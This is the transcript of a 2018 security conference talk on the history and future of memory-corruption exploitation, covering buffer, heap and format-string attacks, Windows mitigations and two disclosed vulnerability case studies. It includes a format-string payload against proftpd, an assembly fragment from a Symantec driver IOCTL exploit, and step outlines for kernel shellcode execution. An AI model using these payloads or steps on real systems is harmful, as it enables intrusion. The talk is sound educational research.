$30 off During Our Annual Pro Sale. View Details »

NanoSec Conference 2018 - Exploitation Era

Nafiez
October 10, 2018

NanoSec Conference 2018 - Exploitation Era

A presentation in NanoSec Conference 2018 held in Malaysia with topic Exploitation Era.

Nafiez

October 10, 2018
Tweet

More Decks by Nafiez

Other Decks in Technology

Transcript

  1. Exploitation Era
    Past, Present and Future

    View Slide

  2. About Us
    Nafiez @zeifan
    - Memory corruption
    hacker
    - Fuzzing & Vulnerability
    Research
    - Live in “paradise”
    Yeh @iamyeh
    - Threat Researcher in
    Carbon Black
    - Malware Reverse
    Engineering
    - Vulnerability Analysis

    View Slide

  3. What’s this talk about?

    View Slide

  4. Introduction
    ● Real world memory corruption exploitation (no XSS, SQLi, LFI,
    etc.)
    ● Mid 90’s until early 2000, introduced types of vulnerabilities
    and exploitation
    ● Vulnerability classes mostly introduced in Linux
    ● More Windows “in-the wild“ exploitation

    View Slide

  5. Continue…
    ● Since 2014, Windows leading in software security mitigations
    ● Exploitation techniques and vulnerability classes killed in
    modern OS’s
    ● Current exploitation techniques in Windows

    View Slide

  6. 0-Day: Reported new bug last week and got this bounty this morning!

    View Slide

  7. The Past

    View Slide

  8. 1988
    Morris Worm
    1995 -
    1997
    Buffer Overflow
    1998 -
    2000
    Exploits Evolution
    2001 -
    2003
    Protections Era
    2004 -
    2006
    Windows Era
    2007 -
    2010
    Evolution of Exploits

    View Slide

  9. Oct 2, 1988
    1988

    View Slide

  10. Morris Worm
    Exploiting 10,000 Computers
    https://docs.lib.purdue.edu/cgi/viewcontent.cgi?article=1701&context=cstech

    View Slide

  11. Oct 20, 1995
    1995

    View Slide

  12. Mudge@l0pht released tutorial “How to
    Write Buffer Overflow”
    https://insecure.org/stf/mudge_buffer_overflow_tutorial.html

    View Slide

  13. Nov 8, 1996
    1996

    View Slide

  14. Smashing the Stack
    Aleph1
    Complete write-up exploiting stack overflow
    http://phrack.org/issues/49/14.html

    View Slide

  15. Aug 10, 1997
    1997

    View Slide

  16. Ret-2-libc
    Solar Designer
    Bypassing NX to inject code
    BUFFER
    Address of system() in libc
    Return from system()
    Address of string “/bin/sh”
    “/bin
    /sh\0”
    libc
    system()
    ret
    https://seclists.org/bugtraq/1997/Aug/63

    View Slide

  17. Jan 31, 1999
    1999

    View Slide

  18. Heap Overflows
    w00w00
    First tutorial of heap overflow
    exploitation
    http://www.w00w00.org/files/articles/heaptut.txt

    View Slide

  19. Sep 20, 1999
    1999

    View Slide

  20. Format String
    proftpd
    First format string bug (introduced)
    ftp> ls
    aaaXXXX%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
    %u%u%u%u%u%u%u%u%u%653300u%n
    https://seclists.org/bugtraq/1999/Sep/328

    View Slide

  21. Nov 8, 2001
    2001

    View Slide

  22. Malloc exploitation
    MaXX
    Malloc exploitation trick, Phrack 57
    http://phrack.org/issues/57/8.html

    View Slide

  23. Nov 8, 2001
    2001

    View Slide

  24. Free() Exploitation
    [email protected] (anonymous)
    free() exploitation pioneer
    http://phrack.org/issues/57/9.html

    View Slide

  25. Feb 7, 2002
    2002

    View Slide

  26. 3rd Generation Exploitation
    Halvar Flake
    1st Generation Exploits
    - Simple stack smashes
    - Control of EIP (RET instruction)
    - E.g. strcpy(), gets(), sprintf()
    - Easy peasy
    2nd Generation Exploits
    - off-by-one
    - Control of EIP (RET instruction)
    - E.g. strncat(), strncpy()
    - No EIP control, EBP manipulation
    - Hard-to-find in nature
    3rd Generation Exploits
    - Format strings, Heap Structure
    - E.g. printf(), malloc(), free()
    - Sometimes trivial to spot
    - No registers control
    https://www.blackhat.com/presentations/win-usa-02/halvarflake-winsec02.ppt

    View Slide

  27. July 30, 2002
    2002

    View Slide

  28. Integer Overflow
    Mark Dowd, Chris Spencer,
    Neel Metha, Nishad Herath,
    Halvar Flake
    First introduced to public
    https://slideplayer.com/slide/9244035/

    View Slide

  29. Aug 2, 2003
    2003

    View Slide

  30. Win32 Device Driver
    Sec-Labs
    METHOD_NEITHER
    ioctl memory
    overwrite targeting
    Symantec AntiVirus
    http://www.nsfocus.net/vulndb/5247
    push 0
    push 0
    @pushsz "\\.\NAVAP" ;open the device
    @callx CreateFileA ;yeah - open it!
    mov ebx,eax ;EBX=DEVICE HANDLE
    cmp eax,-1 ;error ;/
    jne _x00 ;if not jump to _x00 label
    @debug SPLOIT_TITLE,"Cannot open device ;/",IERROR
    jmp exit

    View Slide

  31. Sep 8, 2003
    2003

    View Slide

  32. Windows Server 2003
    David Litchfield
    Defeating Stack Overflow Protection
    https://www.blackhat.com/presentations/bh-asia-03/bh-asia-03-litchfield.pdf

    View Slide

  33. Nov 2, 2004
    2004

    View Slide

  34. Heap Spraying
    Skylined
    Demonstrate against Internet Explorer
    https://www.exploit-db.com/exploits/612/

    View Slide

  35. Jan 21, 2005
    2005

    View Slide

  36. Defeating Heap Protection and DEP Bypass
    PTSecurity
    Defeating heap protection and bypass DEP
    against Windows XP SP2.
    https://www.ptsecurity.com/upload/corporate/ww-en/download/defeating-xpsp2-heap-protection.pdf

    View Slide

  37. Feb 17, 2005
    2005

    View Slide

  38. Remote Windows
    Kernel Exploitation
    Barnaby Jack (RIP)
    https://www.blackhat.com/presentations/bh-usa-05/BH_US_05-Jack_White_Paper.pdf

    View Slide

  39. July 20, 2005
    2005

    View Slide

  40. Windows Kernel Pool Overflow
    Kinvis (SoBeIt) - Beihang University
    https://web.archive.org/web/20070221124210/http://xcon.xfocus.org/XCon2005/archives/2005/Xcon2005_SoBeIt.pdf

    View Slide

  41. Oct 2, 2005
    2005

    View Slide

  42. DEP Bypass Hardware-
    Based
    Skape & skywing
    http://uninformed.org/index.cgi?v=all&a=11

    View Slide

  43. Dec 7, 2005
    2005

    View Slide

  44. Freelist[0]
    Exploitation Technique
    Brett Moore
    http://www.orkspace.net/secdocs/Windows/Protection/Bypass/Exploiting%20Freelist[0]%20On%20XP%20Service%20Pack%202.pdf

    View Slide

  45. Jan 19, 2007
    2007

    View Slide

  46. Double-Free
    Vulnerabilities
    Matthew Conover
    https://www.symantec.com/connect/blogs/double-free-vulnerabilities-part-1
    https://www.symantec.com/connect/blogs/double-free-vulnerabilities-part-2
    Before:
    freelist [n-1][0x003401b8] Flink 0x003401b8 Blink 0x003401b8
    freelist [n][0x003401c0] Flink 0x00341fb0 Blink 0x00341fb0
    chunk [0x00341fa8] Flink 0x003401c0 Blink 0x003401c0
    After:
    freelist [n-1] same
    freelist [n] same
    chunk [0x00341fa8] Flink 0x003401bc Blink 0x003401c4

    View Slide

  47. Mar 27, 2007
    2007

    View Slide

  48. Heap Feng Shui
    Alex Sotirov
    Heap Feng Shui using JavaScript attacking
    browser
    https://www.blackhat.com/presentations/bh-usa-07/Sotirov/Whitepaper/bh-usa-07-sotirov-WP.pdf

    View Slide

  49. Feb 17, 2008
    2008

    View Slide

  50. ASLR Smack
    Tilo Muller
    Complete write-up exploiting stack
    overflow
    https://ece.uwaterloo.ca/~vganesh/TEACHING/S2014/ECE458/aslr.pdf

    View Slide

  51. Aug 4, 2008
    2008

    View Slide

  52. Return Oriented
    Programming
    Erik Buchanan, Ryan Roemer, Stefan
    Savage, Hovav Shacham
    https://www.blackhat.com/presentations/bh-usa-08/Shacham/BH_US_08_Shacham_Return_Oriented_Programming.pdf

    View Slide

  53. Case Study: Emsisoft
    Internet Security - IOCTL
    Vulnerability

    View Slide

  54. Overview
    ● Found in 2015 via fuzzing
    ● Responsible disclosure to vendor (Emsisoft)
    ● Vulnerable IOCTL 0x22e010
    ● Trivial to exploit:
    ○ Lead to overflow and allow to write in
    memory and perform execution

    View Slide

  55. View Slide

  56. View Slide

  57. View Slide

  58. Stack Overflow
    Windows Kernel
    Exploitation
    Process
    01
    Spawn
    processes
    02
    Get handle to
    vulnerable device
    03
    Get vulnerable IOCTL
    function
    04
    Allocate buffer
    (shellcode)
    05
    Create buffer
    redirects execution
    into shellcode

    View Slide

  59. Present

    View Slide

  60. Use-After-Free
    Use-After-Free vulnerability
    found. In order to exploit the
    vulnerability, chain
    vulnerability with Adobe
    Flash.
    Full Code
    Execution
    Exploitation were trivial to
    gain.
    ROP + Info Leak
    Create ROP chain using UAF
    vulnerability in browser and
    chained using Adobe Flash.
    ASLR bypass required, using
    info leak method.
    03
    01 02
    Past
    Exploitation
    Development

    View Slide

  61. What
    happened?
    Developer
    Developer failed to audit
    legacy code, do not
    made any changes, using
    old framework, etc.
    Vulnerability
    Classes
    Vulnerability types and
    classes were still exists.
    Patching
    Patch introduced new
    vulnerability.
    Exploitation
    Exploitation getting more
    complex requires chain
    of vulnerability.

    View Slide

  62. What has changed?

    View Slide

  63. http://gaasedelen.blogspot.com/2014/03/exploiting-icofx-26-cve-2013-4988.html

    View Slide

  64. NX / DEP
    SEHOP /
    ASLR MemGC CFG ACG / RFG Hyper-V
    Based
    Security (VBS)
    - Kernel level
    (enabling
    ACG, CIG,
    RFG, CFG), CFI
    Windows Memory Safety Mitigations

    View Slide

  65. Edge Attack Surface
    Reduction
    Remove whatever feature
    Internet Explorer has.
    Memory Garbage Collection
    (MemGC)
    Focusing on DOM engine
    and turn UAF in DOM
    non-exploitable.
    Type Confusion Protection
    Additional checks to
    eliminate recurring bad
    casts and wrong branching
    on CTreePos
    Vulnerability
    Classes Killer
    https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf
    Stack corruption
    essentially eliminated
    Use-After-Free attack
    decreased
    Raise of
    Out-of-Bounds, DLL
    Planting and Type
    Confusion

    View Slide

  66. Use-After-Free
    Vulnerability found was
    Use-After-Free, in order to to gain
    info leak, it needs to turn to type
    confusion. For some cases it
    doesn’t need to do so.
    Type Confusion
    Usually used as part of vulnerability
    chain.
    Information Leak
    To bypass ASLR, an information
    leak needs to be done. This will
    help to make the exploit reliable.
    Full Code Execution
    Achieve full code execution
    (including remote) with full
    mitigation bypasses.
    Sandbox & Mitigation
    Bypass
    Current mitigations in Windows
    required multiple chains of bypass,
    including CFG, and ACG.
    05
    01
    02 03
    04
    Current
    Exploitation
    Development

    View Slide

  67. Case Study: (PSIRT-8422)
    Adobe Flash ActiveX - NULL
    Pointer

    View Slide

  68. Overview
    ● Found via manual audit
    ○ Focus on Adobe Flash Player ActiveX
    (29.0.0.171)
    ● Responsible disclosure to vendor (Adobe)
    ● Integer Overflow in ActiveX turns NULL Pointer
    ○ Adobe failed to set Kill Bit in registry by
    default
    ● Exploit attempt failed
    ○ Due to memory safety mitigation

    View Slide

  69. View Slide

  70. Future (Past)

    View Slide

  71. ● Exploitation much more harder
    ● Hardware based mitigations and bypasses
    ● Past vulnerability classes remain stay
    ● More chain types of exploitation
    ● Software mitigations improvement
    ● Advanced exploitation could evade security
    perimeter

    View Slide

  72. Intel Control-flow Enforcement Technology
    (CET)
    ➢ Shadow Stack (bypass?)
    ○ Second stack for program
    that used for control transfer
    operations
    ○ Separate from data stack and
    can be enable for operation
    via user mode or supervisor
    mode
    ○ Protecting return address
    and defend against ROP
    ➢ Indirect Branch Tracking (bypass?)
    ○ New instruction named
    ENDBRANCH used to mark
    valid indirect CALL/JMP
    targets in the program
    ○ Protecting free branch
    against JOP / COP
    https://software.intel.com/sites/default/files/managed/4d/2a/control-flow-enforcement-technology-preview.pdf

    View Slide

  73. Conclusion

    View Slide

  74. View Slide

  75. References & Thanks
    ● Thanks to KLKS - for reviewing our slide
    ● NanoSec crew
    ● Haroon Meer BlackHat 2010 Paper on Memory Corruption History
    ○ https://media.blackhat.com/bh-us-10/whitepapers/Meer/BlackHat-USA-2010-Meer-History
    -of-Memory-Corruption-Attacks-wp.pdf
    ● ...and many paper that we used as references :)
    ● Ping us on Telegram (OWASP Malaysia) if you want to talk about exploitation
    and reverse engineering.

    View Slide